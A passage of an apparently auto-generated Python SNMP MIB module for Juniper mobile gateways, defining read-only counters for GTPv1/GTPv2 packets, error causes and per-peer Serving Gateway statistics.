if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsSemErTADRx.setDescription('Number of GTP packets received with cause Semantic Error in TAD Operation.')
jnxMbgSgwGtpV2ICsSemErTADTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 182), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsSemErTADTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsSemErTADTx.setDescription('Number of GTP packets sent with cause Semantic Error in TAD Operation.')
jnxMbgSgwGtpV2ICsSynErTADRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 183), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsSynErTADRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsSynErTADRx.setDescription('Number of GTP packets received with cause Syntactic Error in TAD Operation.')
jnxMbgSgwGtpV2ICsSynErTADTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 184), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsSynErTADTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsSynErTADTx.setDescription('Number of GTP packets sent with cause Syntactic Error in TAD Operation.')
jnxMbgSgwGtpV2ICsRMValRcvRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 185), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsRMValRcvRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsRMValRcvRx.setDescription('Number of GTP packets received with cause Reserved Message Value Received.')
jnxMbgSgwGtpV2ICsRMValRcvTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 186), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsRMValRcvTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsRMValRcvTx.setDescription('Number of GTP packets sent with cause Reserved Message Value Received.')
jnxMbgSgwGtpV2ICsRPrNtRspRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 187), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsRPrNtRspRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsRPrNtRspRx.setDescription('Number of GTP packets received with cause Remote peer not responding.')
jnxMbgSgwGtpV2ICsRPrNtRspTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 188), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsRPrNtRspTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsRPrNtRspTx.setDescription('Number of GTP packets sent with cause Remote peer not responding.')
jnxMbgSgwGtpV2ICsColNWReqRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 189), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsColNWReqRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsColNWReqRx.setDescription('Number of GTP packets received with cause Collision with network initiated request.')
jnxMbgSgwGtpV2ICsColNWReqTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 190), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsColNWReqTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsColNWReqTx.setDescription('Number of GTP packets sent with cause Collision with network initiated request.')
jnxMbgSgwGtpV2ICsUnPgUESusRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 191), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsUnPgUESusRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsUnPgUESusRx.setDescription('Number of GTP packets received with cause Unable to page UE due to suspension.')
jnxMbgSgwGtpV2ICsUnPgUESusTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 192), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsUnPgUESusTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsUnPgUESusTx.setDescription('Number of GTP packets sent with cause Unable to page UE due to suspension.')
jnxMbgSgwGtpV2ICsInvTotLenRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 193), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsInvTotLenRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsInvTotLenRx.setDescription('Number of GTP packets received with cause Invalid total len.')
jnxMbgSgwGtpV2ICsInvTotLenTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 194), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsInvTotLenTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsInvTotLenTx.setDescription('Number of GTP packets sent with cause Invalid total len.')
jnxMbgSgwGtpV2ICsDtForNtSupRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 195), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsDtForNtSupRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsDtForNtSupRx.setDescription('Number of GTP packets received with cause Data forwarding not supported.')
jnxMbgSgwGtpV2ICsDtForNtSupTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 196), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsDtForNtSupTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsDtForNtSupTx.setDescription('Number of GTP packets sent with cause Data forwarding not supported.')
jnxMbgSgwGtpV2ICsInReFRePrRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 197), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsInReFRePrRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsInReFRePrRx.setDescription('Number of GTP packets received with cause Invalid Reply from Remote peer.')
jnxMbgSgwGtpV2ICsInReFRePrTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 198), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsInReFRePrTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsInReFRePrTx.setDescription('Number of GTP packets sent with cause Invalid Reply from Remote peer.')
jnxMbgSgwGtpV2ICsInvPrRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 199), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsInvPrRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsInvPrRx.setDescription('Number of GTP packets received with cause Invalid peer.')
jnxMbgSgwGtpV2ICsInvPrTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 200), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsInvPrTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsInvPrTx.setDescription('Number of GTP packets sent with cause Invalid peer.')
jnxMbgSgwGtpV1ProtocolErrRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 201), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV1ProtocolErrRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV1ProtocolErrRx.setDescription('Number of GTPv1 Protocol Errors Received.')
jnxMbgSgwGtpV1UnSupMsgRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 202), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV1UnSupMsgRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV1UnSupMsgRx.setDescription('Number of GTPv1 Unsupported Messages received.')
jnxMbgSgwGtpV1T3RespTmrExpRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 203), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV1T3RespTmrExpRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV1T3RespTmrExpRx.setDescription('Number of GTP V1 T3 timer expiries Received.')
jnxMbgSgwGtpV1EndMarkerRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 204), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV1EndMarkerRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV1EndMarkerRx.setDescription('Number of GTP V1 end marker packets received.')
jnxMbgSgwGtpV1EndMarkerTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 205), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV1EndMarkerTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV1EndMarkerTx.setDescription('Number of GTP V1 end marker packets sent.')
jnxMbgSgwGtpV1EchoReqRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 206), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV1EchoReqRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV1EchoReqRx.setDescription('Number of GTP V1 echo request packets received.')
jnxMbgSgwGtpV1EchoReqTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 207), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV1EchoReqTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV1EchoReqTx.setDescription('Number of GTP V1 echo request packets sent.')
jnxMbgSgwGtpV1EchoRespRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 208), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV1EchoRespRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV1EchoRespRx.setDescription('Number of GTP V1 echo response packets received.')
jnxMbgSgwGtpV1EchoRespTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 209), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV1EchoRespTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV1EchoRespTx.setDescription('Number of GTP V1 echo response packets sent.')
jnxMbgSgwGtpV1ErrIndRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 210), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV1ErrIndRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV1ErrIndRx.setDescription('Number of GTP V1 Error Indication packets received.')
jnxMbgSgwGtpV1ErrIndTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 211), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV1ErrIndTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV1ErrIndTx.setDescription('Number of GTP V1 Error Indication packets sent.')
jnxMbgSgwSuspNotifRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 212), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwSuspNotifRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwSuspNotifRx.setDescription('Number of GTPv2 Suspend Notification messages received.')
jnxMbgSgwSuspNotifTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 213), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwSuspNotifTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwSuspNotifTx.setDescription('Number of GTPv2 Suspend Notification messages sent.')
jnxMbgSgwSuspAckRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 214), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwSuspAckRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwSuspAckRx.setDescription('Number of GTPv2 Suspend Acknowledgement messages received.')
jnxMbgSgwSuspAckTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 215), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwSuspAckTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwSuspAckTx.setDescription('Number of GTPv2 Suspend Acknowledgement messages sent.')
jnxMbgSgwResumeNotifRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 216), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwResumeNotifRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwResumeNotifRx.setDescription('Number of GTPv2 Resume Notification messages received.')
jnxMbgSgwResumeNotifTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 217), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwResumeNotifTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwResumeNotifTx.setDescription('Number of GTPv2 Resume Notification messages sent.')
jnxMbgSgwResumeAckRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 218), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwResumeAckRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwResumeAckRx.setDescription('Number of GTPv2 Resume Acknowledgement messages received.')
jnxMbgSgwResumeAckTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 219), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwResumeAckTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwResumeAckTx.setDescription('Number of GTPv2 Resume Acknowledgement messages sent.')
jnxMbgSgwS11PiggybackMsgRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 220), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwS11PiggybackMsgRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwS11PiggybackMsgRx.setDescription('Number of GTPv2 S11 Piggyback messages received.')
jnxMbgSgwS11PiggybackMsgTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 221), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwS11PiggybackMsgTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwS11PiggybackMsgTx.setDescription('Number of GTPv2 S11 Piggyback messages sent.')
jnxMbgSgwS4PiggybackMsgRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 222), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwS4PiggybackMsgRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwS4PiggybackMsgRx.setDescription('Number of GTPv2 S4 Piggyback messages received.')
jnxMbgSgwS4PiggybackMsgTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 223), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwS4PiggybackMsgTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwS4PiggybackMsgTx.setDescription('Number of GTPv2 S4 Piggyback messages sent.')
jnxMbgSgwS5PiggybackMsgRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 224), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwS5PiggybackMsgRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwS5PiggybackMsgRx.setDescription('Number of GTPv2 S5 Piggyback messages received.')
jnxMbgSgwS5PiggybackMsgTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 225), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwS5PiggybackMsgTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwS5PiggybackMsgTx.setDescription('Number of GTPv2 S5 Piggyback messages sent.')
# Per-peer GTP-C statistics table (1.3.6.1.4.1.2636.3.66.2.2.1.1), indexed by
# gateway index, remote address, local address, and routing instance.
jnxMbgSgwGtpCPerPeerStatsTable = MibTable((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1), )
if mibBuilder.loadTexts: jnxMbgSgwGtpCPerPeerStatsTable.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpCPerPeerStatsTable.setDescription('Each entry corresponds to a GTP per peer level control statistic.')
# Conceptual row: index objects come from JUNIPER-MOBILE-GATEWAYS (jnxMbgGwIndex)
# plus the three local index columns defined just below.
jnxMbgSgwGtpPerPeerStatsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1), ).setIndexNames((0, "JUNIPER-MOBILE-GATEWAYS", "jnxMbgGwIndex"), (0, "JUNIPER-MOBILE-GATEWAY-SGW-GTP-MIB", "jnxMbgSgwPPGtpRmtAddr"), (0, "JUNIPER-MOBILE-GATEWAY-SGW-GTP-MIB", "jnxMbgSgwPPGtpLclAddr"), (0, "JUNIPER-MOBILE-GATEWAY-SGW-GTP-MIB", "jnxMbgSgwPPGtpRtgInst"))
if mibBuilder.loadTexts: jnxMbgSgwGtpPerPeerStatsEntry.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpPerPeerStatsEntry.setDescription('A specification of the GTPC peer level Statistics.')
# Index columns (sub-ids 1-3). Unlike the counter columns, no setMaxAccess is
# applied here — presumably the pysmi default applies; confirm against the
# source MIB if access level matters.
jnxMbgSgwPPGtpRmtAddr = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 1), IpAddress())
if mibBuilder.loadTexts: jnxMbgSgwPPGtpRmtAddr.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpRmtAddr.setDescription('The Remote IP address of this GTP peer entry.')
jnxMbgSgwPPGtpLclAddr = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 2), IpAddress())
if mibBuilder.loadTexts: jnxMbgSgwPPGtpLclAddr.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpLclAddr.setDescription('The Local IP address of this GTP peer entry.')
jnxMbgSgwPPGtpRtgInst = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 3), Unsigned32())
if mibBuilder.loadTexts: jnxMbgSgwPPGtpRtgInst.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpRtgInst.setDescription('The Routing Instance for this Peer.')
jnxMbgSgwPPRxPacketsDropped = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 4), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPRxPacketsDropped.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPRxPacketsDropped.setDescription('Number of Received Packets Dropped.')
jnxMbgSgwPPPacketAllocFail = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 5), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPPacketAllocFail.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPPacketAllocFail.setDescription('Number of Packet allocation failures.')
jnxMbgSgwPPPacketSendFail = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 6), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPPacketSendFail.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPPacketSendFail.setDescription('Number of Packet Send failures.')
jnxMbgSgwPPIPVerErrRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 7), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPIPVerErrRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPIPVerErrRx.setDescription('Number of IP Version Error Packets Received.')
jnxMbgSgwPPIPProtoErrRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 8), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPIPProtoErrRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPIPProtoErrRx.setDescription('Number of IP Protocol Error packets Received.')
jnxMbgSgwPPGTPPortErrRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 9), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGTPPortErrRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGTPPortErrRx.setDescription('Number of Port Error Packets Received.')
jnxMbgSgwPPGTPUnknVerRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 10), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGTPUnknVerRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGTPUnknVerRx.setDescription('Number of Unknown Version Packets Received.')
jnxMbgSgwPPPcktLenErrRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 11), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPPcktLenErrRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPPcktLenErrRx.setDescription('Number of Packet Length Error Packets Received.')
jnxMbgSgwPPUnknMsgRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 12), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPUnknMsgRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPUnknMsgRx.setDescription('Number of Unknown Messages Received.')
jnxMbgSgwPPProtocolErrRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 13), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPProtocolErrRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPProtocolErrRx.setDescription('Number of GTPv2 Protocol Errors Received.')
jnxMbgSgwPPUnSupportedMsgRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 14), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPUnSupportedMsgRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPUnSupportedMsgRx.setDescription('Number of GTPv2 Unsupported Messages received.')
jnxMbgSgwPPT3RespTmrExpRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 15), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPT3RespTmrExpRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPT3RespTmrExpRx.setDescription('Number of GTP V2 T3 timer expiries Received.')
jnxMbgSgwPPV2NumMsgRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 16), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPV2NumMsgRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPV2NumMsgRx.setDescription('Number of GTPv2 messages received.')
jnxMbgSgwPPV2NumMsgTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 17), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPV2NumMsgTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPV2NumMsgTx.setDescription('Number of GTPV2 messages sent.')
jnxMbgSgwPPV2NumBytesRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 18), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPV2NumBytesRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPV2NumBytesRx.setDescription('Number of GTPv2 bytes received.')
jnxMbgSgwPPV2NumBytesTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 19), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPV2NumBytesTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPV2NumBytesTx.setDescription('Number of GTPV2 bytes sent.')
jnxMbgSgwPPV2EchoReqRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 20), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPV2EchoReqRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPV2EchoReqRx.setDescription('Number of GTP V2 Echo Request received.')
jnxMbgSgwPPV2EchoReqTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 21), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPV2EchoReqTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPV2EchoReqTx.setDescription('Number of GTP V2 Echo Request Sent.')
jnxMbgSgwPPV2EchoRespRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 22), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPV2EchoRespRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPV2EchoRespRx.setDescription('Number of GTP V2 Echo Response received.')
jnxMbgSgwPPV2EchoRespTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 23), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPV2EchoRespTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPV2EchoRespTx.setDescription('Number of GTP V2 Echo Response Sent.')
jnxMbgSgwPPV2VerNotSupRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 24), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPV2VerNotSupRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPV2VerNotSupRx.setDescription('Number of GTP V2 Version Not supported messages received')
jnxMbgSgwPPV2VerNotSupTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 25), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPV2VerNotSupTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPV2VerNotSupTx.setDescription('Number of GTP V2 Number of version not supported messages sent.')
jnxMbgSgwPPCreateSessReqRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 26), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPCreateSessReqRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPCreateSessReqRx.setDescription('Number of GTP V2 Create Session Requests received.')
jnxMbgSgwPPCreateSessReqTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 27), Counter64()).setMaxAccess("readonly")
